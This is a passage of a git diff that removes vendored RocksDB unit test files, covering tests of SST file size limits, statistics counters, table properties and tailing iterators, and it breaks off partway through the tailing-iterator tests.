-  sfm->delete_scheduler()->TEST_SetMaxTrashDBRatio(1.1);
-  ASSERT_OK(DestroyDB(dbname_, options));
-  sfm->WaitForEmptyTrash();
-  // We have deleted the 4 sst files in the delete_scheduler
-  ASSERT_EQ(bg_delete_file, 4);
-}
-
-TEST_F(DBSSTTest, DBWithMaxSpaceAllowed) {
-  std::shared_ptr<SstFileManager> sst_file_manager(NewSstFileManager(env_));
-  auto sfm = static_cast<SstFileManagerImpl*>(sst_file_manager.get());
-
-  Options options = CurrentOptions();
-  options.sst_file_manager = sst_file_manager;
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-
-  // Generate a file containing 100 keys.
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 50)));
-  }
-  ASSERT_OK(Flush());
-
-  uint64_t first_file_size = 0;
-  auto files_in_db = GetAllSSTFiles(&first_file_size);
-  ASSERT_EQ(sfm->GetTotalSize(), first_file_size);
-
-  // Set the maximum allowed space usage to the current total size
-  sfm->SetMaxAllowedSpaceUsage(first_file_size + 1);
-
-  ASSERT_OK(Put("key1", "val1"));
-  // This flush will cause bg_error_ and will fail
-  ASSERT_NOK(Flush());
-}
-
-TEST_F(DBSSTTest, DBWithMaxSpaceAllowedRandomized) {
-  // This test will set a maximum allowed space for the DB, then it will
-  // keep filling the DB until the limit is reached and bg_error_ is set.
-  // When bg_error_ is set we will verify that the DB size is greater
-  // than the limit.
-
-  std::vector<int> max_space_limits_mbs = {1, 2, 4, 8, 10};
-  decltype(max_space_limits_mbs)::value_type limit_mb_cb;
-  bool bg_error_set = false;
-  uint64_t total_sst_files_size = 0;
-
-  std::atomic<int> estimate_multiplier(1);
-  int reached_max_space_on_flush = 0;
-  int reached_max_space_on_compaction = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::FlushMemTableToOutputFile:MaxAllowedSpaceReached",
-      [&](void* arg) {
-        Status* bg_error = static_cast<Status*>(arg);
-        bg_error_set = true;
-        GetAllSSTFiles(&total_sst_files_size);
-        reached_max_space_on_flush++;
-        // low limit for size calculated using sst files
-        ASSERT_GE(total_sst_files_size, limit_mb_cb * 1024 * 1024);
-        // clear error to ensure compaction callback is called
-        *bg_error = Status::OK();
-        estimate_multiplier++;  // used in the main loop assert
-      });
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::FinishCompactionOutputFile:MaxAllowedSpaceReached",
-      [&](void* arg) {
-        bg_error_set = true;
-        GetAllSSTFiles(&total_sst_files_size);
-        reached_max_space_on_compaction++;
-      });
-
-  for (auto limit_mb : max_space_limits_mbs) {
-    bg_error_set = false;
-    total_sst_files_size = 0;
-    estimate_multiplier = 1;
-    limit_mb_cb = limit_mb;
-    rocksdb::SyncPoint::GetInstance()->ClearTrace();
-    rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-    std::shared_ptr<SstFileManager> sst_file_manager(NewSstFileManager(env_));
-    auto sfm = static_cast<SstFileManagerImpl*>(sst_file_manager.get());
-
-    Options options = CurrentOptions();
-    options.sst_file_manager = sst_file_manager;
-    options.write_buffer_size = 1024 * 512;  // 512 Kb
-    DestroyAndReopen(options);
-    Random rnd(301);
-
-    sfm->SetMaxAllowedSpaceUsage(limit_mb * 1024 * 1024);
-
-    int keys_written = 0;
-    uint64_t estimated_db_size = 0;
-    while (true) {
-      auto s = Put(RandomString(&rnd, 10), RandomString(&rnd, 50));
-      if (!s.ok()) {
-        break;
-      }
-      keys_written++;
-      // Check the estimated db size vs the db limit just to make sure we
-      // dont run into an infinite loop
-      estimated_db_size = keys_written * 60;  // ~60 bytes per key
-      ASSERT_LT(estimated_db_size,
-                estimate_multiplier * limit_mb * 1024 * 1024 * 2);
-    }
-    ASSERT_TRUE(bg_error_set);
-    ASSERT_GE(total_sst_files_size, limit_mb * 1024 * 1024);
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  }
-
-  ASSERT_GT(reached_max_space_on_flush, 0);
-  ASSERT_GT(reached_max_space_on_compaction, 0);
-}
-
-TEST_F(DBSSTTest, OpenDBWithInfiniteMaxOpenFiles) {
-  // Open DB with infinite max open files
-  //  - First iteration use 1 thread to open files
-  //  - Second iteration use 5 threads to open files
-  for (int iter = 0; iter < 2; iter++) {
-    Options options;
-    options.create_if_missing = true;
-    options.write_buffer_size = 100000;
-    options.disable_auto_compactions = true;
-    options.max_open_files = -1;
-    if (iter == 0) {
-      options.max_file_opening_threads = 1;
-    } else {
-      options.max_file_opening_threads = 5;
-    }
-    options = CurrentOptions(options);
-    DestroyAndReopen(options);
-
-    // Create 12 Files in L0 (then move then to L2)
-    for (int i = 0; i < 12; i++) {
-      std::string k = "L2_" + Key(i);
-      ASSERT_OK(Put(k, k + std::string(1000, 'a')));
-      ASSERT_OK(Flush());
-    }
-    CompactRangeOptions compact_options;
-    compact_options.change_level = true;
-    compact_options.target_level = 2;
-    db_->CompactRange(compact_options, nullptr, nullptr);
-
-    // Create 12 Files in L0
-    for (int i = 0; i < 12; i++) {
-      std::string k = "L0_" + Key(i);
-      ASSERT_OK(Put(k, k + std::string(1000, 'a')));
-      ASSERT_OK(Flush());
-    }
-    Close();
-
-    // Reopening the DB will load all existing files
-    Reopen(options);
-    ASSERT_EQ("12,0,12", FilesPerLevel(0));
-    std::vector<std::vector<FileMetaData>> files;
-    dbfull()->TEST_GetFilesMetaData(db_->DefaultColumnFamily(), &files);
-
-    for (const auto& level : files) {
-      for (const auto& file : level) {
-        ASSERT_TRUE(file.table_reader_handle != nullptr);
-      }
-    }
-
-    for (int i = 0; i < 12; i++) {
-      ASSERT_EQ(Get("L0_" + Key(i)), "L0_" + Key(i) + std::string(1000, 'a'));
-      ASSERT_EQ(Get("L2_" + Key(i)), "L2_" + Key(i) + std::string(1000, 'a'));
-    }
-  }
-}
-
-TEST_F(DBSSTTest, GetTotalSstFilesSize) {
-  // We don't propagate oldest-key-time table property on compaction and
-  // just write 0 as default value. This affect the exact table size, since
-  // we encode table properties as varint64. Force time to be 0 to work around
-  // it. Should remove the workaround after we propagate the property on
-  // compaction.
-  std::unique_ptr<MockTimeEnv> mock_env(new MockTimeEnv(Env::Default()));
-  mock_env->set_current_time(0);
-
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.compression = kNoCompression;
-  options.env = mock_env.get();
-  DestroyAndReopen(options);
-  // Generate 5 files in L0
-  for (int i = 0; i < 5; i++) {
-    for (int j = 0; j < 10; j++) {
-      std::string val = "val_file_" + ToString(i);
-      ASSERT_OK(Put(Key(j), val));
-    }
-    Flush();
-  }
-  ASSERT_EQ("5", FilesPerLevel(0));
-
-  std::vector<LiveFileMetaData> live_files_meta;
-  dbfull()->GetLiveFilesMetaData(&live_files_meta);
-  ASSERT_EQ(live_files_meta.size(), 5);
-  uint64_t single_file_size = live_files_meta[0].size;
-
-  uint64_t live_sst_files_size = 0;
-  uint64_t total_sst_files_size = 0;
-  for (const auto& file_meta : live_files_meta) {
-    live_sst_files_size += file_meta.size;
-  }
-
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 5
-  // Total SST files = 5
-  ASSERT_EQ(live_sst_files_size, 5 * single_file_size);
-  ASSERT_EQ(total_sst_files_size, 5 * single_file_size);
-
-  // hold current version
-  std::unique_ptr<Iterator> iter1(dbfull()->NewIterator(ReadOptions()));
-
-  // Compact 5 files into 1 file in L0
-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("0,1", FilesPerLevel(0));
-
-  live_files_meta.clear();
-  dbfull()->GetLiveFilesMetaData(&live_files_meta);
-  ASSERT_EQ(live_files_meta.size(), 1);
-
-  live_sst_files_size = 0;
-  total_sst_files_size = 0;
-  for (const auto& file_meta : live_files_meta) {
-    live_sst_files_size += file_meta.size;
-  }
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 1 (compacted file)
-  // Total SST files = 6 (5 original files + compacted file)
-  ASSERT_EQ(live_sst_files_size, 1 * single_file_size);
-  ASSERT_EQ(total_sst_files_size, 6 * single_file_size);
-
-  // hold current version
-  std::unique_ptr<Iterator> iter2(dbfull()->NewIterator(ReadOptions()));
-
-  // Delete all keys and compact, this will delete all live files
-  for (int i = 0; i < 10; i++) {
-    ASSERT_OK(Delete(Key(i)));
-  }
-  Flush();
-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("", FilesPerLevel(0));
-
-  live_files_meta.clear();
-  dbfull()->GetLiveFilesMetaData(&live_files_meta);
-  ASSERT_EQ(live_files_meta.size(), 0);
-
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 0
-  // Total SST files = 6 (5 original files + compacted file)
-  ASSERT_EQ(total_sst_files_size, 6 * single_file_size);
-
-  iter1.reset();
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 0
-  // Total SST files = 1 (compacted file)
-  ASSERT_EQ(total_sst_files_size, 1 * single_file_size);
-
-  iter2.reset();
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 0
-  // Total SST files = 0
-  ASSERT_EQ(total_sst_files_size, 0);
-
-  // Close db before mock_env destruct.
-  Close();
-}
-
-TEST_F(DBSSTTest, GetTotalSstFilesSizeVersionsFilesShared) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.compression = kNoCompression;
-  DestroyAndReopen(options);
-  // Generate 5 files in L0
-  for (int i = 0; i < 5; i++) {
-    ASSERT_OK(Put(Key(i), "val"));
-    Flush();
-  }
-  ASSERT_EQ("5", FilesPerLevel(0));
-
-  std::vector<LiveFileMetaData> live_files_meta;
-  dbfull()->GetLiveFilesMetaData(&live_files_meta);
-  ASSERT_EQ(live_files_meta.size(), 5);
-  uint64_t single_file_size = live_files_meta[0].size;
-
-  uint64_t live_sst_files_size = 0;
-  uint64_t total_sst_files_size = 0;
-  for (const auto& file_meta : live_files_meta) {
-    live_sst_files_size += file_meta.size;
-  }
-
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-
-  // Live SST files = 5
-  // Total SST files = 5
-  ASSERT_EQ(live_sst_files_size, 5 * single_file_size);
-  ASSERT_EQ(total_sst_files_size, 5 * single_file_size);
-
-  // hold current version
-  std::unique_ptr<Iterator> iter1(dbfull()->NewIterator(ReadOptions()));
-
-  // Compaction will do trivial move from L0 to L1
-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("0,5", FilesPerLevel(0));
-
-  live_files_meta.clear();
-  dbfull()->GetLiveFilesMetaData(&live_files_meta);
-  ASSERT_EQ(live_files_meta.size(), 5);
-
-  live_sst_files_size = 0;
-  total_sst_files_size = 0;
-  for (const auto& file_meta : live_files_meta) {
-    live_sst_files_size += file_meta.size;
-  }
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 5
-  // Total SST files = 5 (used in 2 version)
-  ASSERT_EQ(live_sst_files_size, 5 * single_file_size);
-  ASSERT_EQ(total_sst_files_size, 5 * single_file_size);
-
-  // hold current version
-  std::unique_ptr<Iterator> iter2(dbfull()->NewIterator(ReadOptions()));
-
-  // Delete all keys and compact, this will delete all live files
-  for (int i = 0; i < 5; i++) {
-    ASSERT_OK(Delete(Key(i)));
-  }
-  Flush();
-  ASSERT_OK(dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ("", FilesPerLevel(0));
-
-  live_files_meta.clear();
-  dbfull()->GetLiveFilesMetaData(&live_files_meta);
-  ASSERT_EQ(live_files_meta.size(), 0);
-
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 0
-  // Total SST files = 5 (used in 2 version)
-  ASSERT_EQ(total_sst_files_size, 5 * single_file_size);
-
-  iter1.reset();
-  iter2.reset();
-
-  ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size",
-                                       &total_sst_files_size));
-  // Live SST files = 0
-  // Total SST files = 0
-  ASSERT_EQ(total_sst_files_size, 0);
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_statistics_test.cc b/thirdparty/rocksdb/db/db_statistics_test.cc
deleted file mode 100644
index 237a2c6..0000000
--- a/thirdparty/rocksdb/db/db_statistics_test.cc
+++ /dev/null
@@ -1,149 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <string>
-
-#include "db/db_test_util.h"
-#include "monitoring/thread_status_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/statistics.h"
-
-namespace rocksdb {
-
-class DBStatisticsTest : public DBTestBase {
- public:
-  DBStatisticsTest() : DBTestBase("/db_statistics_test") {}
-};
-
-TEST_F(DBStatisticsTest, CompressionStatsTest) {
-  CompressionType type;
-
-  if (Snappy_Supported()) {
-    type = kSnappyCompression;
-    fprintf(stderr, "using snappy\n");
-  } else if (Zlib_Supported()) {
-    type = kZlibCompression;
-    fprintf(stderr, "using zlib\n");
-  } else if (BZip2_Supported()) {
-    type = kBZip2Compression;
-    fprintf(stderr, "using bzip2\n");
-  } else if (LZ4_Supported()) {
-    type = kLZ4Compression;
-    fprintf(stderr, "using lz4\n");
-  } else if (XPRESS_Supported()) {
-    type = kXpressCompression;
-    fprintf(stderr, "using xpress\n");
-  } else if (ZSTD_Supported()) {
-    type = kZSTD;
-    fprintf(stderr, "using ZSTD\n");
-  } else {
-    fprintf(stderr, "skipping test, compression disabled\n");
-    return;
-  }
-
-  Options options = CurrentOptions();
-  options.compression = type;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.statistics->stats_level_ = StatsLevel::kExceptTimeForMutex;
-  DestroyAndReopen(options);
-
-  int kNumKeysWritten = 100000;
-
-  // Check that compressions occur and are counted when compression is turned on
-  Random rnd(301);
-  for (int i = 0; i < kNumKeysWritten; ++i) {
-    // compressible string
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 128) + std::string(128, 'a')));
-  }
-  ASSERT_OK(Flush());
-  ASSERT_GT(options.statistics->getTickerCount(NUMBER_BLOCK_COMPRESSED), 0);
-
-  for (int i = 0; i < kNumKeysWritten; ++i) {
-    auto r = Get(Key(i));
-  }
-  ASSERT_GT(options.statistics->getTickerCount(NUMBER_BLOCK_DECOMPRESSED), 0);
-
-  options.compression = kNoCompression;
-  DestroyAndReopen(options);
-  uint64_t currentCompressions =
-            options.statistics->getTickerCount(NUMBER_BLOCK_COMPRESSED);
-  uint64_t currentDecompressions =
-            options.statistics->getTickerCount(NUMBER_BLOCK_DECOMPRESSED);
-
-  // Check that compressions do not occur when turned off
-  for (int i = 0; i < kNumKeysWritten; ++i) {
-    // compressible string
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 128) + std::string(128, 'a')));
-  }
-  ASSERT_OK(Flush());
-  ASSERT_EQ(options.statistics->getTickerCount(NUMBER_BLOCK_COMPRESSED)
-            - currentCompressions, 0);
-
-  for (int i = 0; i < kNumKeysWritten; ++i) {
-    auto r = Get(Key(i));
-  }
-  ASSERT_EQ(options.statistics->getTickerCount(NUMBER_BLOCK_DECOMPRESSED)
-            - currentDecompressions, 0);
-}
-
-TEST_F(DBStatisticsTest, MutexWaitStatsDisabledByDefault) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  const uint64_t kMutexWaitDelay = 100;
-  ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT,
-                                       kMutexWaitDelay);
-  ASSERT_OK(Put("hello", "rocksdb"));
-  ASSERT_EQ(TestGetTickerCount(options, DB_MUTEX_WAIT_MICROS), 0);
-  ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT, 0);
-}
-
-TEST_F(DBStatisticsTest, MutexWaitStats) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.statistics->stats_level_ = StatsLevel::kAll;
-  CreateAndReopenWithCF({"pikachu"}, options);
-  const uint64_t kMutexWaitDelay = 100;
-  ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT,
-                                       kMutexWaitDelay);
-  ASSERT_OK(Put("hello", "rocksdb"));
-  ASSERT_GE(TestGetTickerCount(options, DB_MUTEX_WAIT_MICROS), kMutexWaitDelay);
-  ThreadStatusUtil::TEST_SetStateDelay(ThreadStatus::STATE_MUTEX_WAIT, 0);
-}
-
-TEST_F(DBStatisticsTest, ResetStats) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  DestroyAndReopen(options);
-  for (int i = 0; i < 2; ++i) {
-    // pick arbitrary ticker and histogram. On first iteration they're zero
-    // because db is unused. On second iteration they're zero due to Reset().
-    ASSERT_EQ(0, TestGetTickerCount(options, NUMBER_KEYS_WRITTEN));
-    HistogramData histogram_data;
-    options.statistics->histogramData(DB_WRITE, &histogram_data);
-    ASSERT_EQ(0.0, histogram_data.max);
-
-    if (i == 0) {
-      // The Put() makes some of the ticker/histogram stats nonzero until we
-      // Reset().
-      ASSERT_OK(Put("hello", "rocksdb"));
-      ASSERT_EQ(1, TestGetTickerCount(options, NUMBER_KEYS_WRITTEN));
-      options.statistics->histogramData(DB_WRITE, &histogram_data);
-      ASSERT_GT(histogram_data.max, 0.0);
-      options.statistics->Reset();
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_table_properties_test.cc b/thirdparty/rocksdb/db/db_table_properties_test.cc
deleted file mode 100644
index 265e9cb..0000000
--- a/thirdparty/rocksdb/db/db_table_properties_test.cc
+++ /dev/null
@@ -1,261 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <unordered_set>
-#include <vector>
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/db.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#ifndef ROCKSDB_LITE
-
-namespace rocksdb {
-
-// A helper function that ensures the table properties returned in
-// `GetPropertiesOfAllTablesTest` is correct.
-// This test assumes entries size is different for each of the tables.
-namespace {
-
-void VerifyTableProperties(DB* db, uint64_t expected_entries_size) {
-  TablePropertiesCollection props;
-  ASSERT_OK(db->GetPropertiesOfAllTables(&props));
-
-  ASSERT_EQ(4U, props.size());
-  std::unordered_set<uint64_t> unique_entries;
-
-  // Indirect test
-  uint64_t sum = 0;
-  for (const auto& item : props) {
-    unique_entries.insert(item.second->num_entries);
-    sum += item.second->num_entries;
-  }
-
-  ASSERT_EQ(props.size(), unique_entries.size());
-  ASSERT_EQ(expected_entries_size, sum);
-}
-}  // namespace
-
-class DBTablePropertiesTest : public DBTestBase {
- public:
-  DBTablePropertiesTest() : DBTestBase("/db_table_properties_test") {}
-  TablePropertiesCollection TestGetPropertiesOfTablesInRange(
-      std::vector<Range> ranges, std::size_t* num_properties = nullptr,
-      std::size_t* num_files = nullptr);
-};
-
-TEST_F(DBTablePropertiesTest, GetPropertiesOfAllTablesTest) {
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = 8;
-  Reopen(options);
-  // Create 4 tables
-  for (int table = 0; table < 4; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      db_->Put(WriteOptions(), ToString(table * 100 + i), "val");
-    }
-    db_->Flush(FlushOptions());
-  }
-
-  // 1. Read table properties directly from file
-  Reopen(options);
-  VerifyTableProperties(db_, 10 + 11 + 12 + 13);
-
-  // 2. Put two tables to table cache and
-  Reopen(options);
-  // fetch key from 1st and 2nd table, which will internally place that table to
-  // the table cache.
-  for (int i = 0; i < 2; ++i) {
-    Get(ToString(i * 100 + 0));
-  }
-
-  VerifyTableProperties(db_, 10 + 11 + 12 + 13);
-
-  // 3. Put all tables to table cache
-  Reopen(options);
-  // fetch key from 1st and 2nd table, which will internally place that table to
-  // the table cache.
-  for (int i = 0; i < 4; ++i) {
-    Get(ToString(i * 100 + 0));
-  }
-  VerifyTableProperties(db_, 10 + 11 + 12 + 13);
-}
-
-TablePropertiesCollection
-DBTablePropertiesTest::TestGetPropertiesOfTablesInRange(
-    std::vector<Range> ranges, std::size_t* num_properties,
-    std::size_t* num_files) {
-
-  // Since we deref zero element in the vector it can not be empty
-  // otherwise we pass an address to some random memory
-  EXPECT_GT(ranges.size(), 0U);
-  // run the query
-  TablePropertiesCollection props;
-  EXPECT_OK(db_->GetPropertiesOfTablesInRange(
-      db_->DefaultColumnFamily(), &ranges[0], ranges.size(), &props));
-
-  // Make sure that we've received properties for those and for those files
-  // only which fall within requested ranges
-  std::vector<LiveFileMetaData> vmd;
-  db_->GetLiveFilesMetaData(&vmd);
-  for (auto& md : vmd) {
-    std::string fn = md.db_path + md.name;
-    bool in_range = false;
-    for (auto& r : ranges) {
-      // smallestkey < limit && largestkey >= start
-      if (r.limit.compare(md.smallestkey) >= 0 &&
-          r.start.compare(md.largestkey) <= 0) {
-        in_range = true;
-        EXPECT_GT(props.count(fn), 0);
-      }
-    }
-    if (!in_range) {
-      EXPECT_EQ(props.count(fn), 0);
-    }
-  }
-
-  if (num_properties) {
-    *num_properties = props.size();
-  }
-
-  if (num_files) {
-    *num_files = vmd.size();
-  }
-  return props;
-}
-
-TEST_F(DBTablePropertiesTest, GetPropertiesOfTablesInRange) {
-  // Fixed random sead
-  Random rnd(301);
-
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = 4096;
-  options.max_write_buffer_number = 3;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 4;
-  options.target_file_size_base = 2048;
-  options.max_bytes_for_level_base = 10240;
-  options.max_bytes_for_level_multiplier = 4;
-  options.hard_pending_compaction_bytes_limit = 16 * 1024;
-  options.num_levels = 8;
-  options.env = env_;
-
-  DestroyAndReopen(options);
-
-  // build a decent LSM
-  for (int i = 0; i < 10000; i++) {
-    ASSERT_OK(Put(test::RandomKey(&rnd, 5), RandomString(&rnd, 102)));
-  }
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  if (NumTableFilesAtLevel(0) == 0) {
-    ASSERT_OK(Put(test::RandomKey(&rnd, 5), RandomString(&rnd, 102)));
-    Flush();
-  }
-
-  db_->PauseBackgroundWork();
-
-  // Ensure that we have at least L0, L1 and L2
-  ASSERT_GT(NumTableFilesAtLevel(0), 0);
-  ASSERT_GT(NumTableFilesAtLevel(1), 0);
-  ASSERT_GT(NumTableFilesAtLevel(2), 0);
-
-  // Query the largest range
-  std::size_t num_properties, num_files;
-  TestGetPropertiesOfTablesInRange(
-      {Range(test::RandomKey(&rnd, 5, test::RandomKeyType::SMALLEST),
-             test::RandomKey(&rnd, 5, test::RandomKeyType::LARGEST))},
-      &num_properties, &num_files);
-  ASSERT_EQ(num_properties, num_files);
-
-  // Query the empty range
-  TestGetPropertiesOfTablesInRange(
-      {Range(test::RandomKey(&rnd, 5, test::RandomKeyType::LARGEST),
-             test::RandomKey(&rnd, 5, test::RandomKeyType::SMALLEST))},
-      &num_properties, &num_files);
-  ASSERT_GT(num_files, 0);
-  ASSERT_EQ(num_properties, 0);
-
-  // Query the middle rangee
-  TestGetPropertiesOfTablesInRange(
-      {Range(test::RandomKey(&rnd, 5, test::RandomKeyType::MIDDLE),
-             test::RandomKey(&rnd, 5, test::RandomKeyType::LARGEST))},
-      &num_properties, &num_files);
-  ASSERT_GT(num_files, 0);
-  ASSERT_GT(num_files, num_properties);
-  ASSERT_GT(num_properties, 0);
-
-  // Query a bunch of random ranges
-  for (int j = 0; j < 100; j++) {
-    // create a bunch of ranges
-    std::vector<std::string> random_keys;
-    // Random returns numbers with zero included
-    // when we pass empty ranges TestGetPropertiesOfTablesInRange()
-    // derefs random memory in the empty ranges[0]
-    // so want to be greater than zero and even since
-    // the below loop requires that random_keys.size() to be even.
-    auto n = 2 * (rnd.Uniform(50) + 1);
-
-    for (uint32_t i = 0; i < n; ++i) {
-      random_keys.push_back(test::RandomKey(&rnd, 5));
-    }
-
-    ASSERT_GT(random_keys.size(), 0U);
-    ASSERT_EQ((random_keys.size() % 2), 0U);
-
-    std::vector<Range> ranges;
-    auto it = random_keys.begin();
-    while (it != random_keys.end()) {
-      ranges.push_back(Range(*it, *(it + 1)));
-      it += 2;
-    }
-
-    TestGetPropertiesOfTablesInRange(std::move(ranges));
-  }
-}
-
-TEST_F(DBTablePropertiesTest, GetColumnFamilyNameProperty) {
-  std::string kExtraCfName = "pikachu";
-  CreateAndReopenWithCF({kExtraCfName}, CurrentOptions());
-
-  // Create one table per CF, then verify it was created with the column family
-  // name property.
-  for (int cf = 0; cf < 2; ++cf) {
-    Put(cf, "key", "val");
-    Flush(cf);
-
-    TablePropertiesCollection fname_to_props;
-    ASSERT_OK(db_->GetPropertiesOfAllTables(handles_[cf], &fname_to_props));
-    ASSERT_EQ(1U, fname_to_props.size());
-
-    std::string expected_cf_name;
-    if (cf > 0) {
-      expected_cf_name = kExtraCfName;
-    } else {
-      expected_cf_name = kDefaultColumnFamilyName;
-    }
-    ASSERT_EQ(expected_cf_name,
-              fname_to_props.begin()->second->column_family_name);
-    ASSERT_EQ(cf, static_cast<uint32_t>(
-                      fname_to_props.begin()->second->column_family_id));
-  }
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_tailing_iter_test.cc b/thirdparty/rocksdb/db/db_tailing_iter_test.cc
deleted file mode 100644
index d217828..0000000
--- a/thirdparty/rocksdb/db/db_tailing_iter_test.cc
+++ /dev/null
@@ -1,814 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// Introduction of SyncPoint effectively disabled building and running this test
-// in Release build.
-// which is a pity, it is a good test
-#if !defined(ROCKSDB_LITE)
-
-#include "db/db_test_util.h"
-#include "db/forward_iterator.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-class DBTestTailingIterator : public DBTestBase {
- public:
-  DBTestTailingIterator() : DBTestBase("/db_tailing_iterator_test") {}
-};
-
-TEST_F(DBTestTailingIterator, TailingIteratorSingle) {
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-  iter->SeekToFirst();
-  ASSERT_TRUE(!iter->Valid());
-
-  // add a record and check that iter can see it
-  ASSERT_OK(db_->Put(WriteOptions(), "mirko", "fodor"));
-  iter->SeekToFirst();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().ToString(), "mirko");
-
-  iter->Next();
-  ASSERT_TRUE(!iter->Valid());
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorKeepAdding) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  std::string value(1024, 'a');
-
-  const int num_records = 10000;
-  for (int i = 0; i < num_records; ++i) {
-    char buf[32];
-    snprintf(buf, sizeof(buf), "%016d", i);
-
-    Slice key(buf, 16);
-    ASSERT_OK(Put(1, key, value));
-
-    iter->Seek(key);
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(key), 0);
-  }
-}
-
-TEST_F(DBTestTailingIterator, TailingIteratorSeekToNext) {
-  CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-  ReadOptions read_options;
-  read_options.tailing = true;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(read_options, handles_[1]));
-  std::unique_ptr<Iterator> itern(db_->NewIterator(read_options, handles_[1]));
-  std::string value(1024, 'a');
-
-  const int num_records = 1000;
-  for (int i = 1; i < num_records; ++i) {
